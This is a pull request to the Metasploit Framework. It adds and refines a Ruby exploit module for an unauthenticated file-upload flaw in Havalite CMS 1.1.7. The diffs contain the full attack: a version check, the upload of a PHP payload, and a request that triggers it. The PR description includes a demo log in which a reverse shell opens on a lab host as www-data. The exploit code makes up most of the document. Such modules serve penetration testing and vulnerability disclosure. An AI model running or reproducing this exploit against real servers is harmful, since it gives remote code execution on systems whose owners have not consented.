### PR TITLE
Add OSVDB-94405 - Havalite CMS Arbitary File Upload Vulnerability

### DIFF
--- a/modules/exploits/unix/webapp/havalite_upload_exec.rb
+++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb
@@ -16,7 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info={})
 		super(update_info(info,
 			'Name'           => "Havalite CMS Arbitary File Upload Vulnerability",
-			'Description'    => %q{Module Description},
+			'Description'    => %q{
+				This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
+				possibly prior.  Attackers can abuse the upload feature in order to upload a
+				malicious php file without authentication, which results in arbitary remote code
+				execution.
+			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
@@ -25,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
-					['OSVDB', '80768'],
+					['OSVDB', '94405'],
 					['EDB', '26243']
 				],
 			'Payload'        =>
@@ -55,19 +60,46 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	#
+	# Checks if target is running HavaLite CMS 1.1.7
+	# We only flag 1.1.7 as vulnerable, because we don't have enough information from
+	# the vendor or OSVDB about exactly which ones are really vulnerable.
+	#
+	def check
+		uri = normalize_uri(target_uri.path)
+		res = send_request_raw({'uri' => uri})
+
+		if not res
+			print_error("#{peer} - Connection timed out")
+			return Exploit::CheckCode::Unknown
+		end
+
+		js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
+		version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''
+
+		if not version.empty? and version =~ /1\.1\.7/
+			print_status("#{peer} - Version found: #{version}")
+			return Exploit::CheckCode::Vulnerable
+		end
+
+		Exploit::CheckCode::Unknown
+	end
+
+
+	#
 	# Uploads our malicious file
 	#
 	def upload(base)
 		p     = get_write_exec_payload(:unlink_self=>true)
-		fname = 'payload.php'
+		fname = "#{rand_text_alpha(5)}.php"
 
 		data = Rex::MIME::Message.new
-		data.add_part(p, nil, nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
+		data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
 		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
 		res = send_request_cgi({
 			'method' => 'POST',
 			'uri'    => normalize_uri(base, 'upload.php'),
+			'ctype'  => "multipart/form-data; boundary=#{data.bound}",
 			'data'   => post_data
 		})
 
@@ -75,8 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading")
 		elsif res.code.to_i == 404
 			fail_with(Exploit::Failure::NotFound, "#{peer} - No upload.php found")
-		elsif res.code.to_i != 200
-			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Unknown response. Server returns: #{res.code.to_s}")
 		end
 
 		return fname
@@ -88,14 +118,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def exec(base, payload_fname)
 		res = send_request_raw({
-			'method' => 'GET',
-			'uri'    => normalize_uri(base, 'tmp', 'files', payload_fname)
+			'uri' => normalize_uri(base, 'tmp', 'files', payload_fname)
 		})
 
-		if not res
-			fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while executing #{payload_name}")
-		elsif res.code.to_i == 404
-			fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_name}. The upload probably failed")
+		if res and res.code == 404
+			fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
 		end
 	end
 

--- a/modules/exploits/unix/webapp/havalite_upload_exec.rb
+++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
 				],
 			'Privileged'     => false,
-			'DisclosureDate' => "Mar 30 2013",
+			'DisclosureDate' => "Jun 17 2013",
 			'DefaultTarget'  => 0))
 
 			register_options(

--- a/modules/exploits/unix/webapp/havalite_upload_exec.rb
+++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 				This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
 				possibly prior.  Attackers can abuse the upload feature in order to upload a
-				malicious php file without authentication, which results in arbitary remote code
+				malicious PHP file without authentication, which results in arbitary remote code
 				execution.
 			},
 			'License'        => MSF_LICENSE,

--- a/modules/exploits/unix/webapp/havalite_upload_exec.rb
+++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb
@@ -107,6 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading")
 		elsif res.code.to_i == 404
 			fail_with(Exploit::Failure::NotFound, "#{peer} - No upload.php found")
+		elsif res.body =~ /"error"\:"abort"/
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to write #{fname}")
 		end
 
 		return fname

--- a/modules/exploits/unix/webapp/havalite_upload_exec.rb
+++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb
@@ -1,0 +1,112 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::PhpEXE
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Havalite CMS Arbitary File Upload Vulnerability",
+			'Description'    => %q{Module Description},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'CWH',
+					'sinn3r'  #Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '80768'],
+					['EDB', '26243']
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'Platform'       => ['linux', 'php'],
+			'Targets'        =>
+				[
+					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
+					[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Mar 30 2013",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('TARGETURI', [true, 'The base path to havalite', '/havalite/'])
+				], self.class)
+	end
+
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+
+	#
+	# Uploads our malicious file
+	#
+	def upload(base)
+		p     = get_write_exec_payload(:unlink_self=>true)
+		fname = 'payload.php'
+
+		data = Rex::MIME::Message.new
+		data.add_part(p, nil, nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
+		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => normalize_uri(base, 'upload.php'),
+			'data'   => post_data
+		})
+
+		if not res
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading")
+		elsif res.code.to_i == 404
+			fail_with(Exploit::Failure::NotFound, "#{peer} - No upload.php found")
+		elsif res.code.to_i != 200
+			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Unknown response. Server returns: #{res.code.to_s}")
+		end
+
+		return fname
+	end
+
+
+	#
+	# Executes our uploaded malicious file
+	#
+	def exec(base, payload_fname)
+		res = send_request_raw({
+			'method' => 'GET',
+			'uri'    => normalize_uri(base, 'tmp', 'files', payload_fname)
+		})
+
+		if not res
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while executing #{payload_name}")
+		elsif res.code.to_i == 404
+			fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_name}. The upload probably failed")
+		end
+	end
+
+
+	def exploit
+		base = target_uri.path
+
+		print_status("#{peer} - Uploading malicious file...")
+		fname = upload(base)
+
+		print_status("#{peer} - Executing #{fname}...")
+		exec(base, fname)
+	end
+end

--- a/modules/exploits/unix/webapp/havalite_upload_exec.rb
+++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			register_options(
 				[
-					OptString.new('TARGETURI', [true, 'The base path to havalite', '/havalite/'])
+					OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
 				], self.class)
 	end
 
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# the vendor or OSVDB about exactly which ones are really vulnerable.
 	#
 	def check
-		uri = normalize_uri(target_uri.path)
+		uri = normalize_uri(target_uri.path, 'havalite/')
 		res = send_request_raw({'uri' => uri})
 
 		if not res
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => normalize_uri(base, 'upload.php'),
+			'uri'    => normalize_uri(base, 'havalite', 'upload.php'),
 			'ctype'  => "multipart/form-data; boundary=#{data.bound}",
 			'data'   => post_data
 		})
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def exec(base, payload_fname)
 		res = send_request_raw({
-			'uri' => normalize_uri(base, 'tmp', 'files', payload_fname)
+			'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)
 		})
 
 		if res and res.code == 404


### PR DESCRIPTION
Demo:

```
msf exploit(havalite_upload_exec) > check

[*] 10.0.1.80:80 - Version found: 1.1.7
[+] The target is vulnerable.
msf exploit(havalite_upload_exec) > exploit

[*] Started reverse handler on 10.0.1.76:4444 
[*] 10.0.1.80:80 - Uploading malicious file...
[*] 10.0.1.80:80 - Executing FoOtS.php...
[*] Sending stage (36 bytes) to 10.0.1.80
[*] Command shell session 8 opened (10.0.1.76:4444 -> 10.0.1.80:45781) at 2013-06-19 02:22:56 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

You can download the cms here:
http://www.exploit-db.com/exploits/26243/

Installation instructions:
http://havalite.com/?p=27

If you're wondering how to do this: "php5 or above with PDO and SqLite3 driver enabled", here's how:
sudo apt-get install php5-sqlite
